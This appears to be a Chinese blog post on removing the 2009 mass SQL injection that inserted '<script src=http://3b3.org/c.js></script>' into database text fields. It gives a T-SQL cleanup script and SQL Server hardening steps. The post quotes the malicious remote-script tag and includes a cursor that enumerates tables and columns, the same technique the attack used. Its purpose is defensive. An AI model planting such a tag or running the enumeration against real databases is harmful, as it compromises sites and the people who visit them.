实战http3b3.orgc.js恶意SQL注入

最新推荐文章于 2024-05-15 23:43:08 发布
最新推荐文章于 2024-05-15 23:43:08 发布
阅读量8.1k 收藏 6
点赞数
分类专栏: SQL 注入问题 文章标签: sql table 数据库 c

--原帖:
http://topic.csdn.net/u/20090326/11/5e584897-2dd7-4e10-af1b-9b48b146af8e.html


如何最快速度删除?
" <script   src=http://3b3.org/c.js> </script> "
---------------------------------------------------------------
进入SQL查询分析器
选择你的数据库
第一步:先sql表修改所有者为dbo
EXEC   sp_MSforeachtable   'exec   sp_changeobjectowner   ''?'', ''dbo'''

第二步:统一删除字段被挂的js
declare   @delStr   nvarchar(500)  
set   @delStr= ' <script   src=http://3b3.org/c.js> </script> '

set   nocount   on

declare   @tableName   nvarchar(100),@columnName   nvarchar(100),

@tbID   int,@iRow   int,@iResult   int  ,@sql   nvarchar(500)

set   @iResult=0  
declare   cur   cursor   for  
select   name,id   from   sysobjects   where   xtype= 'U '

open   cur  
fetch   next   from   cur   into   @tableName,@tbID

while   @@fetch_status=0  
begin  
declare   cur1   cursor   for  
--xtype   in   (231,167,239,175,35)   为char,varchar,nchar,nvarchar,text类型  
select   name   from   syscolumns   where   xtype  

in   (231,167,239,175,35)   and   id=@tbID  
open   cur1  
fetch   next   from   cur1   into   @columnName  
while   @@fetch_status=0  
begin  
            set   @sql= 'update   [ '   +   @tableName   +   ']  

set   [ '+   @columnName   + ']=   replace([ '+@columnName+ '],

' ' '+@delStr+ ' ' ', ' ' ' ')   where   [ '+@columnName+ ']   like   ' '% '+@delStr+ '% ' ' '  
            exec   sp_executesql   @sql            
            set   @iRow=@@rowcount  
            set   @iResult=@iResult+@iRow  
            if   @iRow> 0  
            begin
print   '表: '+@tableName+ ',列: '+@columnName+ '被更新 '+convert(varchar(10),@iRow)+ '条记录; '  
            end            
            fetch   next   from   cur1   into   @columnName


end  
close   cur1  
deallocate   cur1  

fetch   next   from   cur   into   @tableName,@tbID  
end  
print   '数据库共有 '+convert(varchar(10),@iResult)+ '条记录被更新!!! '

close   cur  
deallocate   cur  
set   nocount   off
---------------------------------------------------------------
彻底杜绝SQL注入

1、不要使用sa用户连接数据库。
2、新建一个public权限数据库用户,并用这个用户访问数据库。
3、[角色]去掉角色public对sysobjects与syscolumns对象的select访问权限 。
4、[用户]用户名称-> 右键-属性-权限-在sysobjects与syscolumns上面打“×”。
5、通过以下代码检测(失败表示权限正确,如能显示出来则表明权限太高):
DECLARE   @T   varchar(255),
@C   varchar(255)
DECLARE   Table_Cursor   CURSOR   FOR
Select   a.name,b.name   from   sysobjects   a,syscolumns   b
where   a.id=b.id   and   a.xtype= 'u '   and  

(b.xtype=99   or   b.xtype=35   or   b.xtype=231   or   b.xtype=167)  
OPEN   Table_Cursor
FETCH   NEXT   FROM   Table_Cursor   INTO   @T,@C
WHILE(@@FETCH_STATUS=0)
BEGIN   print   @c
FETCH   NEXT   FROM   Table_Cursor   INTO   @T,@C  
END
CLOSE   Table_Cursor
DEALLOCATE   Table_Cursor  
---------------------------------------------------------------

sdhdy
关注
  • 0
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
XiaoZhao-ChongChongChong:机器学习算法,大厂面经,coding,算法比赛资源整合大礼包~助你校招乘风破浪!内容持续更新中,欢迎star:glowing_star:
05-07
x 3关闭当前分屏c-x 0只保留当前分屏c-x 1打开最近使用的文件bufferc-x c-r删除bufferc-x k切换到其他bufferc-x b有道词典查单词选中单词后,c-c oEMACS快捷键教程:rooster:日程提醒功能删除 ~/.emacs.d/gtd.orgc-...
浙江台州湾潮问带沉积物痕量金属形态及其黄铁矿矿化程度 (2011年)
05-17
在浙江椒江口潮间带采集了3个未扰动沉积物柱状样,并采用分级提取方法获得了沉积物各痕量金属的活性态和黄铁矿态分量,同时采用冷扩散法测试了酸可挥发性硫化物(AVS)。结果表明:研究区痕量金属黄铁矿矿化程度(DOP)...
SQL2005防止http://3b3.org/c.js注入
sql_help的专栏
06-02 559
<br />SQL2000的操作方法:<br />1、不要使用sa用户连接数据库。<br />SA帐户拥有所有数据库和数据表的操作权限,在网页中使用SA连接数据库安全隐患非常大。<br />2、新建一个public权限数据库用户,并用这个用户访问数据库。<br />为了增加安全系数,建议每个数据库建立独立的只有public权限管理帐户,并用这个用户访问数据库有利于SQL的安全性。<br />3、[角色]去掉角色public对sysobjects与syscolumns对象的select访问权限。<br />4
实战http://3b3.org/c.js恶意SQL注入
a32232730的博客
07-02 158
1--进入SQL查询分析器2--选择你的数据库3--第一步:先sql表修改所有者为dbo4EXECsp_MSforeachtable'execsp_changeobjectowner''?'',''dbo'''5--第二步:统一删除字段被挂的js6declare@delStrnvarchar(500)7set@delStr='<scri...
【vue3.0】从零开始搭建TypeScript + less的px转rem + 反向代理 + axios + vuex
qq_50785995的博客
04-19 157
一、创建项目 Npm 修改下载源 1、找一个空白文件地址,在地址栏上输入cmd dos系统进入当前文件地址 dos系统中直接输入代码 npm config get registry 查看当前源 当前为淘宝镜像地址,如果你不是,需要修改当前npm 的下载源 修改npm 下载源 npm config set registry https://registry.npm.taobao.org 下载 cnpm ...
main函数参数及可变参数列表
静陌慕春
08-04 640
C语言中main函数是程序的入口函数,一般在使用main函数的时候都是不带参数的,那么main函数带上参数又如何呢?  main函数形式:int main(int argc,char *argv[],char *envp[]) {    program; }可知main函数有三个参数: 1,argc:记录命令行参数的个数(包含第一个参数–可执行文件名),是一个整型变量; 2,argv:表示命令行
main函数的参数和可变参数列表
smell201611010513的博客
04-28 7355
一.main函数的参数解析 一般来说,我们写main函数,就定义main(),它的参数部分看似没有,实际上,main函数也是有参数的,只是在我们写时省略了。 main函数的参数由三部分组成,分别是argc(int型,表示命令行参数的个数)、argv[](char*数组型,指向命令行的每一个命令参数)、envp[](char*数组型,指向环境变量)。 说明:argc包括程序本身,所以它大于等于...
git-2.29.2.2-64-bit安装_啥都学点之使用nvm安装Node.js并实现Node.js多版本管理
weixin_39908070的博客
11-21 89
刚开始使用Node.js的时候,直接到官网下载安装中文站点:https://nodejs.org/zh-cn/Node.js网站截图当接触的项目多以后,会出现一个问题,2个项目,使用的是不同的Node.js版本。这种情况下,对于多个版本的Node.js的切换将是一件非常麻烦的事情。这样才能方便的管理和切换Node.js版本呢,NVM就是一个很好的解决方案,安装NVM后,可以方便的在一台设备上进行多...
初学C语言之main函数
诸葛老刘的博客
05-08 185
文章目录一. main函数的参数 在实际开发, main函数一般都需要参数,没有参数的情况极少. main函数的参数是从命令提示符下执行程序的时候输入, 例如ls命令 一. main函数的参数 main函数的参数有三个:argc, argv和envp int argc 用于存放命令行参数的个数 char *argc[] 是个字符串的数组, 每个元素都是一个字符指针, 指向一个字符串, 即命令行中的每一个参数 char *envp[]是个字符串的数组, 每个元素都是指向一个程序运行时的环境变量的字符指针.,
C语言main函数的参数
C语言技术网-码农有道
03-30 789
文章目录一、main函数的参数二、C程序的规范写法三、envp参数四、课后作业五、版权声明 程序运行的时候,有些需要带参数,有些不带参数,例如linux操作系统的命令,它们本质上就是C程序。 1)Linux命令中,无参数的不多。 pwd #显示当前目录 clear #清屏 2)大部Linux命令是带参数的。 cp book1.c book2.c mkdir /tmp/dname mv bo...
SQL进阶(六):通关题:制作一个活动日历
最新发布
qq_33489955的博客
05-15 316
就是求当月的最后一天是周几,周六算1天,周日算两天SELECT(CASEELSE 0FROMGROUP BYyear_monthSELECTFROM[(5,)]a4 = '5' # 在 '' 中填入你的结果,如 a4 = '5' 代表有个 5 个周末(周六,周日分开计算,例如 2个周六 和 3个周日 = 5个周末)
1、sql server数据库进行sql注入
weixin_51520483的博客
05-15 576
1、判断数据类型是很重要的一点,影响后面的注入语句2、确定列数时,要多测几组数据,从而分析判断列数,并不是遇到第一个报错就停止测试3、正常网页(例如id=1,参数正确)没有注入回显时,试试报错情况(id=-1),注入回显有可能被正常返回数据覆盖4、注入回显的字段有可能整形、字符、小数等,注意是否需要单引号5、最好先全部统一会先字段类型,比如全部整形,挨个轮流改变为字符形。
[NSSRound#1 Basic]sql_by_sql
Jay17的博客
05-09 371
[NSSRound#1 Basic]sql_by_sql
SQL的心得
weixin_64842400的博客
05-11 449
接着,系统按照 GROUP BY 子句中的指定字段分组,并对每个分组进行计算,生成虚拟的分组结果表。执行顺序 :from > on > where > group by > having > select > distinct > order by > top。4、聚合函数本质:对指定的列进行聚合,如果我们用了group by,我们可以对每个分组应用内聚合函数。在分组内部,聚合函数会自动处理所有重复的行。具体来说,在执行 SELECT 子句时,系统先计算 SELECT 中的列表达式和函数等,然后。
CTF网络安全大赛web题目:just_sqli
Pythonit教程网
05-15 505
但请注意,这种攻击是违法的,并且只应在法律允许和道德接受的环境(如安全培训或测试环境)中进行。是SQL注释,所以查询的剩余部分(包括密码验证部分)将被忽略。这样,查询将返回表中的所有用户,无论他们的密码是什么。来防止"SELECT"关键词的使用,然而这种尝试是无效的,因为它并没有在构造完整的SQL查询时应用此检查。从给定的PHP代码中,有几个关键的安全问题可以被利用来进行SQL注入。然而,为了获取管理员权限,我们可能还需要进一步利用其他漏洞或尝试其他注入方法,因为此查询仅返回用户名和。
使用函数波动性优化 PostgreSQL 查询:Volatile, Stable, and Immutable
weixin_43230594的博客
05-12 513
Optimizing PostgreSQL Queries with Function Volatility: Volatile, Stable, and Immutable

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值